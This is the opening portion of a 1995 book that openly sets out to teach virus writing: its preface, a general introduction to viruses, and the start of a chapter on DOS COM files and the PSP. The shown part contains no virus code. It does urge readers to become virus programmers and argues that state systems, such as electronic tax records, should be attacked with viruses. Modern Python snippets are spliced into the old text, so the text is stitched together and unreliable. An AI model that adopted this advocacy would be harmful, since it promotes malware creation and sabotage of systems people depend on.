Mark Ludwig
American Eagle Publications, Inc.
ISBN 0-929408-10-1
1995
American Eagle Publications, Inc., 1995
Post Office Box 1507
Show Low, Arizona 85901
© 1995 Mark A. Ludwig
Front cover artwork (c) 1995 Mark Forrer

Library of Congress Cataloging-in-Publication Data
LC Control Number: 95020534
Personal Name: Ludwig, Mark A.
Main Title: The giant black book of computer viruses / by Mark Ludwig.
Published/Created: Show Low, Ariz. : American Eagle, 1995.
Description: 662 p. : ill. ; 22 cm.
ISBN: 0929408101 (alk. paper)
Notes: Includes index.
Subjects: Computer viruses.
LC Classification: QA76.76.C68 L79 1995
Dewey Class No.: 005.8 20
This book will simply and plainly teach you how to write computer viruses. It is not one of those all too common books that decry viruses and call for secrecy about the technology they employ, while curiously giving you just enough technical details about viruses so you don't feel like you've been cheated. Rather, this book is technical and to the point. Here you will find complete sources for plug-and-play viruses, as well as enough technical knowledge to become a proficient cutting-edge virus programmer or anti-virus programmer.
Now I am certain this book will be offensive to some people. Publication of so-called "inside information" always provokes the ire of those who try to control that information. Though it is not my intention to offend, I know that in the course of informing many I will offend some.
In another age, this elitist mentality would be derided as a relic of monarchism. Today, though, many people seem all too ready to give up their God-given rights with respect to what they can own, to what they can know, and to what they can do for the sake of their personal and financial security. This is plainly the mentality of a slave, and it is rampant everywhere I look. I suspect that only the sting of a whip will bring this perverse love affair with slavery to an end.
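I, for one, will defend freedom, and specifically the freedom to learn technical information about computer viruses. As I see it, there are three reasons for making this kind of information public:

1. It can help people defend against malevolent viruses.
2. Viruses are of great interest for military purposes in an information-driven world.
3. They allow people to explore useful technology and artificial life for themselves.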
Let's discuss each of these three points in detail...
The standard paradigm for defending against viruses is to buy an anti-virus product and let it catch viruses for you. For the average user who has a few application programs to write letters and balance his checkbook, that is probably perfectly adequate. There are, however, times when it simply is not.
In a company which has a large number of computers, one is bound to run across less well-known viruses, or even new viruses. Although there are perhaps 100 viruses which are responsible for 98% of all virus infections, rarer varieties do occasionally show up, and sometimes you are lucky enough to be attacked by something entirely new. In an environment with lots of computers, the probability of running into a virus which your anti-virus program can't handle easily is obviously higher than for a single user who rarely changes his software configuration.
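The point about large sites can be made concrete with a short calculation. The sketch below assumes, purely for illustration, that each machine independently has the same small chance of meeting a virus the scanner cannot handle during some period. The function name, the per-machine probability and the machine counts are all made-up values, not figures from this book.

```python
def chance_of_unhandled_virus(p_per_machine: float, machines: int) -> float:
    """Probability that at least one of `machines` computers meets such a virus.

    Assumes each machine is hit independently with probability p_per_machine.
    """
    # The chance that no machine is hit is (1 - p)^n; take the complement.
    return 1.0 - (1.0 - p_per_machine) ** machines


if __name__ == "__main__":
    p = 0.001  # hypothetical per-machine chance, chosen only for illustration
    for n in (1, 100, 1000):
        print(f"{n:5d} machines: {chance_of_unhandled_virus(p, n):.3f}")
```

Under these assumed numbers a single user faces a one-in-a-thousand risk, while a site with a hundred machines faces roughly one in ten and a site with a thousand machines is more likely than not to see such a virus.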
Firstly, there will always be viruses which anti-virus programs cannot detect. There is often a very long delay between when a virus is created and when an anti-virus developer incorporates proper detection and removal procedures into his software. I learned this only too well when I wrote The Little Black Book of Computer Viruses. That book included four new viruses, but only one anti-virus developer picked up on those viruses in the first six months after publication. Most did not pick up on them until after a full year in print, and some still don't detect these viruses. The reason is simply that a book was outside their normal channels for acquiring viruses. Typically anti-virus vendors frequent underground BBS's, trade among each other, and depend on their customers for viruses. Any virus that doesn't come through those channels may escape their notice for years. If a published virus can evade most for more than a year, what about a private release?
Next, just because an anti-virus program is going to help you identify a virus doesn't mean it will give you a lot of help getting rid of it. Especially with the less common varieties, you might find that the cure is worse than the virus itself. For example, your "cure" might simply delete all the EXE files on your disk, or rename them to VXE, etc.
In the end, any competent professional must realize that solid technical knowledge is the foundation for all viral defense. In some situations it is advisable to rely on another party for that technical knowledge, but not always. There are many instances in which a failure of data integrity could cost people their lives, or could cost large sums of money, or could cause pandemonium. In these situations, waiting for a third party to analyze some new virus and send someone to your site to help you is out of the question. You have to be able to handle a threat when it comes - and this requires detailed technical knowledge.
Finally, even if you intend to rely heavily on a commercial anti-virus program for protection, solid technical knowledge will make it possible to conduct an informal evaluation of that product. I have been appalled at how poor some published anti-virus product reviews have been. For example, PC Magazine's reviews in the March 16, 1993 issue 1 put Central Point Anti-Virus in the Number One slot despite the fact that this product could not even complete analysis of a fairly standard test suite of viruses (it hung the machine) 2 and despite the fact that this product has some glaring security holes which were known both by virus writers and the antiviral community at the time,3 and despite the fact that the person in charge of those reviews was specifically notified of the problem. With a bit of technical knowledge and the proper tools, you can conduct your own review to find out just what you can and cannot expect from an anti-virus program.
High-tech warfare relies increasingly on computers and information. 4 Whether we're talking about a hand-held missile, a spy satellite or a ground station, an early-warning radar station or a personnel carrier driving cross country, relying on a PC and the Global Positioning System to navigate, computers are everywhere. Stopping those computers or convincing them to report misinformation can thus become an important part of any military strategy or attack.
In the twentieth century it has become the custom to keep military technology cloaked in secrecy and deny military power to the people. As such, very few people know the first thing about it, and very few people care to know anything about it. However, the older American tradition was one of openness and individual responsibility. All the people together were the militia, and standing armies were the bane of free men.
In suggesting that information about computer viruses be made public because of its potential for military use, I am harking back to that older tradition. Standing armies and hordes of bureaucrats are a bane to free men. (And by armies, I don't just mean Army, Navy, Marines, Air Force, etc.)
It would seem that the governments of the world are inexorably driving towards an ideal: the Orwellian god-state. Right now we have a first lady who has even said the most important book she's ever read was Orwell's 1984. She is working hard to make it a reality, too. Putting military-grade weapons in the hands of ordinary citizens is the surest way of keeping tyranny at bay. That is a time-honored formula. It worked in America in 1776. It worked in Switzerland during World War II. It worked for Afghanistan in the 1980's, and it has worked countless other times. The Orwellian state is an information monopoly. Its power is based on knowing everything about everybody. Information weapons could easily make it an impossibility.
I have heard that the US Postal Service is ready to distribute 100 million smart cards to citizens of the US. Perhaps that is just a wild rumor. Perhaps by the time you read this, you will have received yours. Even if you never receive it, though, don't think the government will stop collecting information about you, or stop demanding that you - or your bank, phone company, etc. - spend more and more time sending it information about yourself. In seeking to become God it must be all-knowing and all-powerful.
Yet information is incredibly fragile. It must be correct to be useful, but what if it is not correct? Let me illustrate: before long we may see 90% of all tax returns being filed electronically. However, if there were reason to suspect that 5% of those returns had been electronically modified (e.g. by a virus), then none of them could be trusted. 5 Yet to audit every single return to find out which were wrong would either be impossible or it would catalyze a revolution - I'm not sure which. What if the audit process released even more viruses so that none of the returns could be audited unless everything was shut down, and they were gone through by hand one by one?
In the end, the Orwellian state is vulnerable to attack - and it should be attacked. There is a time when laws become immoral, and to obey them is immoral, and to fight against not only the individual laws but the whole system that creates them is good and right. I am not saying we are at that point now, as I write. Certainly there are many laws on the books which are immoral, and that number is growing rapidly. One can even argue that there are laws which would be immoral to obey. Perhaps we have crossed the line, or perhaps we will sometime between when I wrote this and when you are reading. In such a situation, I will certainly sleep better at night knowing that I've done what I could to put the tools to fight in people's hands.
Put quite simply, computer viruses are fascinating. They do something that's just not supposed to happen in a computer. The idea that a computer could somehow "come alive" and become quite autonomous from man was the science fiction of the 1950's and 1960's. However, with computer viruses it has become the reality of the 1990's. Just the idea that a program can take off and go - and gain an existence quite apart from its creator - is fascinating indeed. I have known many people who have found viruses to be interesting enough that they've actually learned assembly language by studying them.
A whole new scientific discipline called Artificial Life has grown up around this idea that a computer program can reproduce and pass genetic information on to its offspring. What I find fascinating about this new field is that it allows one to study the mechanisms of life on a purely mathematical, informational level. That has at least two big benefits: 6
In view of these considerations, it would seem that computer-based self-reproducing automata could bring on an explosion of new mathematical knowledge about life and how it works.
Where this field will end up, I really have no idea. However, since computer viruses are the only form of artificial life that have gained a foothold in the wild, we can hardly dismiss them as unimportant, scientifically speaking.
Despite their scientific importance, some people would no doubt like to outlaw viruses because they are perceived as a nuisance. (And it matters little whether these viruses are malevolent, benign, or even beneficial.) However, when one begins to consider carbon-based life from the point of view of inanimate matter, one reaches much the same conclusions. We usually assume that life is good and that it deserves to be protected. However, one cannot take a step further back and see life as somehow beneficial to the inanimate world. If we consider only the atoms of the universe, what difference does it make if the temperature is seventy degrees Fahrenheit or twenty million? What difference would it make if the earth were covered with radioactive materials? None at all. Whenever we talk about the environment and ecology, we always assume that life is good and that it should be nurtured and preserved. Living organisms universally use the inanimate world with little concern for it, from the smallest cell which freely gathers the nutrients it needs and pollutes the water it swims in, right up to the man who crushes up rocks to refine the metals out of them and build airplanes. Living organisms use the material world as they see fit. Even when people get upset about something like strip mining, or an oil spill, their point of reference is not that of inanimate nature. It is an entirely selfish concept (with respect to life) that motivates them. The mining mars the beauty of the landscape - a beauty which is in the eye of the (living) beholder - and it makes it uninhabitable. If one did not place a special emphasis on life, one could just as well promote strip mining as an attempt to return the earth to its pre-biotic state! From the point of view of inanimate matter, all life is bad because it just hastens the entropic death of the universe.
I say all of this not because I have a bone to pick with ecologists. Rather I want to apply the same reasoning to the world of computer viruses. As long as one uses only financial criteria to evaluate the worth of a computer program, viruses can only be seen as a menace. What do they do besides damage valuable programs and data? They are ruthless in attempting to gain access to the computer system resources, and often the more ruthless they are, the more successful. Yet how does that differ from biological life? If a clump of moss can attack a rock to get some sunshine and grow, it will do so ruthlessly. We call that beautiful. So how different is that from a computer virus attaching itself to a program? If all one is concerned about is the preservation of the inanimate objects (which are ordinary programs) in this electronic world, then of course viruses are a nuisance.
But maybe there is something deeper here. That all depends on what is most important to you, though. It seems that modern culture has degenerated to the point where most men have no higher goals in life than to seek their own personal peace and prosperity. By personal peace, I do not mean freedom from war, but a freedom to think and believe whatever you want without ever being challenged in it. More bluntly, the freedom to live in a fantasy world of your own making. By prosperity, I mean simply an ever increasing abundance of material possessions. Karl Marx looked at all of mankind and said that the motivating force behind every man is his economic well being. The result, he said, is that all of history can be interpreted in terms of class struggles - people fighting for economic control. Even though many decry Marx as the father of communism, our nation is trying to squeeze into the straitjacket he has laid for us. Here in America, people vote their wallets, and the politicians know it. That's why 98% of them go back to office election after election, even though many of them are great philanderers.
In a society with such values, the computer becomes merely a resource which people use to harness an abundance of information and manipulate it to their advantage. If that is all there is to computers, then computer viruses are a nuisance, and they should be eliminated. Surely there must be some nobler purpose for mankind than to make money, despite its necessity. Marx may not think so. The government may not think so. And a lot of loudmouthed people may not think so. Yet great men from every age and every nation testify to the truth that man does have a higher purpose. Should we not be as Socrates, who considered himself ignorant, and who sought Truth and Wisdom, and valued them more highly than silver and gold? And if so, the question that really matters is not how computers can make us wealthy or give us power over others, but how they might make us wise. What can we learn about ourselves? about our world? and, yes, maybe even about God? Once we focus on that, computer viruses become very interesting. Might we not understand life a little better if we can create something similar, and study it, and try to understand it? And if we understand life better, will we not understand our lives, and our world better as well?
Several years ago I would have told you that all the information in this book would probably soon be outlawed. However, I think The Little Black Book has done some good work in changing people's minds about the wisdom of outlawing it. There are some countries, like England and Holland (holdouts of monarchism) where there are laws against distributing this information. Then there are others, like France, where important precedents have been set to allow the free exchange of such information. What will happen in the US right now is anybody's guess. Although the Bill of Rights would seem to protect such activities, the Constitution has never stopped Congress or the bureaucrats in the past - and the anti-virus lobby has been persistent about introducing legislation for years now.
In the end, I think the deciding factor will simply be that the anti-virus industry is imploding. After the Michelangelo scare, the general public became cynical about viruses, viewing them as much less of a problem than the anti-virus people would like. Good anti-virus programs are commanding less and less money, and the industry has shrunk dramatically in the past couple years. Companies are dropping their products, merging, and diversifying left and right. The big operating system manufacturers provide an anti-virus program with DOS now, and shareware/freeware anti-virus software which does a good job is widely available. In short, there is a full scale recession in this industry, and money spent on lobbying can really only be seen as cutting one's own throat.
Yet these developments do not ensure that computer viruses will survive. They only mean that viruses probably won't be outlawed. Much more important to the long term survival of viruses as a viable form of programming is to find beneficial uses for them. Most people won't suffer even a benign virus to remain in their computer once they know about it, since they have been conditioned to believe that VIRUS = BAD. No matter how sophisticated the stealth mechanism, it is no match for an intelligent programmer who is intent on catching the virus. This leaves virus writers with one option: create viruses which people will want on their computers.
Some progress has already been made in this area. For example, the virus called Cruncher compresses executable files and saves disk space for you. The Potassium Hydroxide virus encrypts your hard disk and floppies with a very strong algorithm so that no one can access it without entering the password you selected when you installed it. I expect we will see more and more beneficial viruses like this as time goes on. As the general public learns to deal with viruses more rationally, it begins to make sense to ask whether any particular application might be better implemented using self-reproduction. We will discuss this more in later chapters.
For now, I'd like to invite you to take the attitude of an early scientist. These explorers wanted to understand how the world worked - and whether it could be turned to a profit mattered little. They were trying to become wiser in what's really important by understanding the world a little better. After all, what value could there be in building a telescope so you could see the moons around Jupiter? Galileo must have seen something in it, and it must have meant enough to him to stand up to the ruling authorities of his day and do it, and talk about it, and encourage others to do it. And to land in prison for it. Today some people are glad he did.
So why not take the same attitude when it comes to creating "life" on a computer? One has to wonder where it might lead. Could there be a whole new world of electronic artificial life forms possible, of which computer viruses are only the most rudimentary sort? Perhaps they are the electronic analog of the simplest one-celled creatures, which were only the tiny beginning of life on earth. What would be the electronic equivalent of a flower, or a dog? Where could it lead? The possibilities could be as exciting as the idea of a man actually standing on the moon would have been to Galileo. We just have no idea.
Whatever those possibilities are, one thing is certain: the open-minded individual - the possibility thinker - who seeks out what is true and right, will rule the future. Those who cower in fear, those who run for security and vote for personal peace and affluence have no future. No investor ever got rich by hiding his wealth in safe investments. No intellectual battle was ever won through retreat. No nation has ever become great by putting its citizens' eyes out. So put such foolishness aside and come explore this fascinating new world with me.
What is a computer virus? Simply put, it is a program that reproduces. When it is executed, it simply makes one or more copies of itself. Those copies may later be executed to create still more copies, ad infinitum.
Typically, a computer virus attaches itself to another program, or rides on the back of another program, in order to facilitate reproduction. This approach sets computer viruses apart from other self-reproducing software because it enables the virus to reproduce without the operator's consent. Compare this with a simple program called "1.COM". When run, it might create "2.COM" and "3.COM", etc., which would be exact copies of itself. Now, the average computer user might run such a program once or twice at your request, but then he'll probably delete it and that will be the end of it. It won't get very far. Not so, the computer virus, because it attaches itself to otherwise useful programs. The computer user will execute these programs in the normal course of using the computer, and the virus will get executed with them. In this way, viruses have gained viability on a world-wide scale.
Actually, the term computer virus is a misnomer. It was coined by Fred Cohen in his 1985 graduate thesis, 1 which discussed self-reproducing software and its ability to compromise so-called secure systems. Really, "virus" is an emotionally charged epithet. The very word bodes evil and suggests something bad. Even Fred Cohen has repented of having coined the term,2 and he now suggests that we call these programs "living programs" instead. Personally I prefer the more scientific term self-reproducing automaton.3 That simply describes what such a program does without adding the negative emotions associated with "virus" yet also without suggesting life where there is a big question whether we should call something truly alive. However, I know that trying to re-educate people who have developed a bad habit is almost impossible, so I'm not going to try to eliminate or replace the term "virus", bad though it may be.
In fact, a computer virus is much more like a simple one-celled living organism than it is like a biological virus. Although it may attach itself to other programs, those programs are not alive in any sense. Furthermore, the living organism is not inherently bad, though it does seem to have a measure of self-will. Just as lichens may dig into a rock and eat it up over time, computer viruses can certainly dig into your computer and do things you don't want. Some of the more destructive ones will wipe out everything stored on your hard disk, while any of them will at least use a few CPU cycles here and there.
Aside from the aspect of self-will, though, we should realize that computer viruses per se are not inherently destructive. They may take a few CPU cycles; however, since a virus that gets noticed tends to get wiped out, the only successful viruses are those that take an unnoticeable fraction of your system's resources. Viruses that have given the computer virus a name for being destructive generally contain logic bombs which trigger at a certain date and then display a message or do something annoying or nasty. Such logic bombs, however, have nothing to do with viral self-reproduction. They are payloads - add-ons - to the self-reproducing code.
When I say that computer viruses are not inherently destructive, of course, I do not mean that you don't have to watch out for them. There are some virus writers out there who have no other goal but to destroy the data on your computer. As far as they are concerned, they want their viruses to be memorable experiences for you. They're nihilists, and you'd do well to try to steer clear of the destruction they're trying to cause. So by all means do watch out ... but at the same time, consider the positive possibilities of what self-reproducing code might be able to do that ordinary programs may not. After all, a virus could just as well have some good routines in it as bad ones.
Every viable computer virus must have at least two basic parts, or subroutines, if it is even to be called a virus. Firstly, it must contain a search routine, which locates new files or new disks which are worthwhile targets for infection. This routine will determine how well the virus reproduces, e.g., whether it does so quickly or slowly, whether it can infect multiple disks or a single disk, and whether it can infect every portion of a disk or just certain specific areas. As with all programs, there is a size versus functionality tradeoff here. The more sophisticated the search routine is, the more space it will take up. So although an efficient search routine may help a virus to spread faster, it will make the virus bigger.
Secondly, every computer virus must contain a routine to copy itself into the program which the search routine locates. The copy routine will only be sophisticated enough to do its job without getting caught. The smaller it is, the better. How small it can be will depend on how complex a virus it must copy, and what the target is. For example, a virus which infects only COM files can get by with a much smaller copy routine than a virus which infects EXE files. This is because the EXE file structure is much more complex, so the virus must do more to attach itself to an EXE file.
In addition to search and copy mechanisms, computer viruses often contain anti-detection routines, or anti-anti-virus routines. These range in complexity from something that merely keeps the date on a file the same when a virus infects it, to complex routines that camouflage viruses and trick specific anti-virus programs into believing they're not there, or routines which turn the anti-virus they attack into a logic bomb itself.
Both the search and copy mechanisms can be designed with anti-detection in mind, as well. For example, the search routine may be severely limited in scope to avoid detection. A routine which checked every file on every disk drive, without limit, would take a long time and it would cause enough unusual disk activity that an alert user would become suspicious.
Finally, a virus may contain routines unrelated to its ability to reproduce effectively. These may be destructive routines aimed at wiping out data, or mischievous routines aimed at spreading a political message or making people angry, or even routines that perform some useful function.
Computer viruses are normally classified according to the types of programs they infect and the method of infection employed. The broadest distinction is between boot sector infectors, which take over the boot sector (which executes only when you first turn your computer on) and file infectors, which infect ordinary program files on a disk. Some viruses, known as multi-partite viruses, infect both boot sectors and program files.
Program file infectors may be further classified according to which types of programs they infect. They may infect COM, EXE or SYS files, or any combination thereof. Then EXE files come in a variety of flavors, including plain-vanilla DOS EXE's, Windows EXE's, OS/2 EXE's, etc. These types of programs have considerable differences, and the viruses that infect them are very different indeed.
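The differences between these program types show up in the first bytes of the file, which is also how a file-identification or analysis tool tells them apart. The sketch below is a minimal, heuristic classifier written in Python rather than assembler. The function name and the returned labels are hypothetical, and the check rests on two well-known conventions: DOS EXE files begin with the signature "MZ", and newer formats store the offset of a second header in the 32-bit field at offset 0x3C.

```python
import struct


def classify_program(data: bytes) -> str:
    """Roughly classify a DOS-era program image by its header bytes."""
    # DOS EXE files start with the two-byte signature "MZ" (rarely "ZM").
    if len(data) < 2 or data[:2] not in (b"MZ", b"ZM"):
        # A COM file is a flat image with no header, so this is only a guess.
        return "flat binary (possibly COM)"
    # Newer formats keep the DOS header and point to a second header
    # through the little-endian 32-bit field at offset 0x3C.
    if len(data) >= 0x40:
        (new_header_offset,) = struct.unpack_from("<I", data, 0x3C)
        signature = data[new_header_offset:new_header_offset + 2]
        if signature == b"NE":
            return "NE executable (16-bit Windows or OS/2)"
        if signature == b"PE":
            return "PE executable (32-bit Windows)"
        if signature in (b"LE", b"LX"):
            return "LE/LX executable (VxD or 32-bit OS/2)"
    return "plain DOS EXE"
```

A plain DOS EXE may hold arbitrary bytes at offset 0x3C, so a real tool would validate the second header further before trusting the result.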
Finally, we must note that a virus can be written to infect any kind of code, even code that might have to be compiled or interpreted before it can be executed. Thus, a virus could infect a C or Basic program, a batch file, or a Paradox or Dbase program. It needn't be limited to infecting machine language programs.
Most viruses are written in assembly language. High level languages like Basic, C and Pascal have been designed to generate stand-alone programs, but the assumptions made by these languages render them almost useless when writing viruses. They are simply incapable of performing the acrobatics required for a virus to jump from one host program to another. Apart from a few exceptions we'll discuss, one must use assembly language to write viruses. It is just the only way to get exacting control over all the computer system's resources and use them the way you want to, rather than the way somebody else thinks you should.
This book is written to be accessible to anyone with a little experience with assembly language programming, or to anyone with any programming experience, provided they're willing to do a little work to learn assembler. Many people have told me that The Little Black Book was an excellent tutorial on assembly language programming. I would like to think that this book will be an even better tutorial.
If you have not done any programming in assembler before, I would suggest you get a good tutorial on the subject to use alongside this book. (A few are mentioned in the Suggested Reading at the end of this book.) In the following chapters, I will assume that your knowledge of the technical details of PC's - like file structures, function calls, segmentation and hardware design - is limited, and I will try to explain such matters carefully at the start. However, I will assume that you have some knowledge of assembly language - at least at the level where you can understand what some of the basic machine instructions, like mov ax,bx, do. If you are not familiar with simpler assembly language programming like this, go get a book on the subject. With a little work it will bring you up to speed.
If you are somewhat familiar with assembler already, then all you'll need to get some of the viruses here up and running is this book and an assembler. The viruses published here are written to be compatible with three popular assemblers, unless otherwise noted. These assemblers are (1) Microsoft's Macro Assembler, MASM, (2) Borland's Turbo Assembler, TASM, and (3) the shareware A86 assembler. Of these I personally prefer TASM, because it does exactly what you tell it to without trying to outsmart you - and that is exactly what is needed to assemble a virus. The only drawback with it is that you can't assemble and link OS/2 programs and some special Windows programs like Virtual Device Drivers with it. My second choice is MASM, and A86 is clearly third. Although you can download A86 from many BBS's or the Internet for free, the author demands a hefty license fee if you really want to use the thing - as much as the cost of MASM - and it is clearly not as good a product.
This book is broken down into three parts. The first part discusses viral reproduction techniques, ranging from the simplest overwriting virus to complex multi-partite viruses and viruses for advanced operating systems. The second part discusses anti-anti-virus techniques commonly used in viruses, including simple techniques to hide file changes, ways to hide virus code from prying eyes, and polymorphism. The third part discusses payloads, both destructive and beneficial.
One final word before digging into some actual viruses: if you don't understand what any of the particular viruses we discuss in this book are doing, don't mess with them. Don't just blindly type in the code, assemble it, and run it. That is asking for trouble, just like a four year old child with a loaded gun. Also, please don't cause trouble with these viruses. I'm not describing them so you can unleash them on innocent people. As far as people who deserve it, please at least try to turn the other cheek. I may be giving you power, but with it comes the responsibility to gain wisdom.
When learning about viruses it is best to start out with the simplest examples and understand them well. Such viruses are not only easy to understand ... they also present the least risk of escape, so you can experiment with them without the fear of roasting your company's network. Given this basic foundation, we can build fancier varieties which employ advanced techniques and replicate much better. That will be the mission of later chapters.
In the world of DOS viruses, the simplest and least threatening is the non-resident COM file infector. This type of virus infects only COM program files, which are just straight 80x86 machine code. They contain no data structures for the operating system to interpret (unlike EXE files) - just code. The very simplicity of a COM file makes it easy to infect with a virus. Likewise, non-resident viruses leave no code in memory which goes on working after the host program (which the virus is attached to) is done working. That means as long as you're sitting at the DOS prompt, you're safe. The virus isn't off somewhere doing something behind your back.
Now be aware that when I say a non-resident COM infector is simple and non-threatening, I mean that in terms of its ability to reproduce and escape. There are some very nasty non-resident COM infectors floating around in the underground. They are nasty because they contain nasty logic bombs, though, and not because they take the art of virus programming to new highs.
There are three major types of COM infecting viruses which we will discuss in detail in the next few chapters. They are called:
If you can understand these three simple types of viruses, you will already understand the majority of viruses being written today. Most of them are one of these three types and nothing more.
Before we dig into how the simplest of these viruses, the overwriting virus, works, let's take an in-depth look at how a COM program works. It is essential to understand what it is you're attacking if you're going to do it properly.
When one enters the name of a program at the DOS prompt, DOS begins looking for files with that name and an extent of "COM". If it finds one it will load the file into memory and execute it. Otherwise DOS will look for files with the same name and an extent of "EXE" to load and execute. If no EXE file is found, the operating system will finally look for a file with the extent "BAT" to execute. Failing all three of these possibilities, DOS will display the error message "Bad command or file name."
EXE and COM files are directly executable by the Central Processing Unit. Of these two types of program files, COM files are much simpler. They have a predefined segment format which is built into the structure of DOS, while EXE files are designed to handle a segment format defined by the programmer, typical of very large and complicated programs. The COM file is a direct binary image of what should be put into memory and executed by the CPU, but an EXE file is not.
To execute a COM file, DOS does some preparatory work, loads the program into memory, and then gives the program control. Up until the time when the program receives control, DOS is the program executing, and it is manipulating the program as if it were data. To understand this whole process, let's take a look at the operation of a simple non-viral COM program which is the assembly language equivalent of hello.c - that infamous little program used in every introductory C programming course. Here it is:
.model tiny
.code
ORG 100H
HOST:
mov ah, 9 ;prepare to display a message
mov dx,OFFSET HI ;address of message
int 21H ;display it with DOS
mov ax, 4C00H ;prepare to terminate program
int 21H ;and terminate with DOS
HI DB 'You have just released a virus! Have a nice day!$'
END HOST
Call it HOST.ASM. It will assemble to HOST.COM. This program will serve us well in this chapter, because we'll use it as a host for virus infections.
Now, when you type "HOST" at the DOS prompt, the first thing DOS does is reserve memory for this program to live in. To understand how a COM program uses memory, it is useful to remember that COM programs are really a relic of the days of CP/M - an old disk operating system used by earlier microcomputers that used 8080 or Z80 processors. In those days, the processor could only address 64 kilobytes of memory and that was it. When MS-DOS and PC-DOS came along, CP/M was very popular. There were thousands of programs - many shareware - for CP/M and practically none for any other processor or operating system (excepting the Apple II). So both the 8088 and MS-DOS were designed to make porting the old CP/M programs as easy as possible. The 8088-based COM program is the end result.
In the 8088 microprocessor, all registers are 16 bit registers. A 16 bit register will only allow one to address 64 kilobytes of memory, just like the 8080 and Z80. If you want to use more memory, you need more bits to address it. The 8088 can address up to one megabyte of memory using a process known as segmentation. It uses two registers to create a physical memory address that is 20 bits long instead of just 16. Such a register pair consists of a segment register, which contains the most significant bits of the address, and an offset register, which contains the least significant bits. The segment register points to a 16 byte block of memory, and the offset register tells how many bytes to add to the start of the 16 byte block to locate the desired byte in memory. For example, if the ds register is set to 1275 Hex and the bx register is set to 457 Hex, then the physical 20 bit address of the byte ds:[bx] is
1275H x 10H = 12750H
            +   457H
              ------
              12BA7H
No offset should ever have to be larger than 15, but one normally uses values up to the full 64 kilobyte range of the offset register. This leads to the possibility of writing a single physical address in several different ways. For example, setting ds = 12BA Hex and bx = 7 would produce the same physical address 12BA7 Hex as in the example above. The proper choice is simply whatever is convenient for the programmer. However, it is standard programming practice to set the segment registers and leave them alone as much as possible, using offsets to range through as much data and code as one can (64 kilobytes if necessary). Typically, in 8088 assembler, the segment registers are implied quantities. For example, if you write the assembler instruction
mov ax,[bx]
when the bx register is equal to 7, the ax register will be loaded with the word value stored at offset 7 in the data segment. The data segment ds never appears in the instruction because it is automatically implied. If ds = 12BAH, then you are really loading the word stored at physical address 12BA7H.
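The segment arithmetic above is easy to check by hand, but a few lines of Python make the aliasing of addresses concrete. This is only an illustrative sketch: the function name `physical_address` is made up for this example, and the wrap to 20 bits reflects the 8088's 20 address lines.

```python
def physical_address(segment: int, offset: int) -> int:
    """Return the 20-bit physical address for a real-mode segment:offset pair."""
    if not (0 <= segment <= 0xFFFF and 0 <= offset <= 0xFFFF):
        raise ValueError("segment and offset must each fit in 16 bits")
    # Multiply the segment by 10H (shift left 4 bits), add the offset,
    # and keep only the low 20 bits.
    return ((segment << 4) + offset) & 0xFFFFF


# The two register settings from the text name the same byte in memory.
print(f"{physical_address(0x1275, 0x457):05X}H")  # 12BA7H
print(f"{physical_address(0x12BA, 0x007):05X}H")  # 12BA7H
```

Both calls print the same address, which is the point made above: many segment:offset pairs can refer to one physical location.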
The 8088 has four segment registers, cs, ds, ss and es, which stand for Code Segment, Data Segment, Stack Segment, and Extra Segment, respectively. They each serve different purposes. The cs register specifies the 64K segment where the actual program instructions which are executed by the CPU are located. The Data Segment is used to specify a segment to put the program's data in, and the Stack Segment specifies where the program's stack is located. The es register is available as an extra segment register for the programmer's use. It might be used to point to the video memory segment, for writing data directly to video, or to the segment 40H where the BIOS stores crucial low-level configuration information about the computer.
COM files, as a carry-over from the days when there was only 64K memory available, use only one segment. Before executing a COM file, DOS sets all the segment registers to one value, cs=ds=es=ss. All data is stored in the same segment as the program code itself, and the stack shares this segment. Since any given segment is 64 kilobytes long, a COM program can use at most 64 kilobytes for all of its code, data and stack. And since segment registers are usually implicit in the instructions, an ordinary COM program which doesn't need to access BIOS data, or video data, etc., directly need never fuss with them. The program HOST is a good example. It contains no direct references to any segment; DOS can load it into any segment and it will work fine.
The segment used by a COM program must be set up by DOS before the COM program file itself is loaded into this segment at offset 100H. DOS also creates a Program Segment Prefix, or PSP, in memory from offset 0 to 0FFH (See Figure 3.1).
| Offset | Size | Description |
|---|---|---|
| 0 | 2 | Int 20H Instruction |
| 2 | 2 | Address of last allocated segment |
| 4 | 1 | Reserved, should be zero |
| 5 | 5 | Far call to Int 21H vector |
| A | 4 | Int 22H vector (Terminate program) |
| E | 4 | Int 23H vector (Ctrl-C handler) |
| 12 | 4 | Int 24H vector (Critical error handler) |
| 16 | 22 | Reserved |
| 2C | 2 | Segment of DOS environment |
| 2E | 34 | Reserved |
| 50 | 3 | Int 21H / RETF instruction |
| 53 | 9 | Reserved |
| 5C | 16 | File Control Block 1 |
| 6C | 20 | File Control Block 2 |
| 80 | 128 | Default DTA (command line at startup) |
| 100 | - | Beginning of COM program |
Fig. 3.1: The Program Segment Prefix
The PSP is really a relic from the days of CP/M too, when this low memory was where the operating system stored crucial data for the system. Much of it isn't used at all in most programs. For example, it contains file control blocks (FCB's) for use with the DOS file open/read/write/close functions 0FH, 10H, 14H, 15H, etc. Nobody in their right mind uses those functions, though. They're CP/M relics. Much easier to use are the DOS handle-based functions 3DH, 3EH, 3FH, 40H, etc., which were introduced in DOS 2.00. Yet it is conceivable these old functions could be used, so the needed data in the PSP must be maintained. At the same time, other parts of the PSP are quite useful. For example, everything after the program name in the command line used to invoke the COM program is stored in the PSP starting at offset 80H. If we had invoked HOST as
C:\HOST Hello there!
then the PSP would look like this:
2750:0000  CD 20 00 9D 00 9A F0 FE-1D F0 4F 03 85 21 8A 03  . ........O..!..
2750:0010  85 21 17 03 85 21 74 21-01 08 01 00 02 FF FF FF  .!...!t!........
2750:0020  FF FF FF FF FF FF FF FF-FF FF FF FF 32 27 4C 01  ............2'L.
2750:0030  45 26 14 00 18 00 50 27-FF FF FF FF 00 00 00 00  E&....P'........
2750:0040  06 14 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
2750:0050  CD 21 CB 00 00 00 00 00-00 00 00 00 00 48 45 4C  .!...........HEL
2750:0060  4C 4F 20 20 20 20 20 20-00 00 00 00 00 54 48 45  LO      .....THE
2750:0070  52 45 21 20 20 20 20 20-00 00 00 00 00 00 00 00  RE!     ........
2750:0080  0E 20 48 65 6C 6C 6F 20-74 68 65 72 65 21 20 0D  . Hello there! .
2750:0090  6F 20 74 68 65 72 65 21-20 0D 61 72 64 0D 00 00  o there! .ard...
2750:00A0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
2750:00B0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
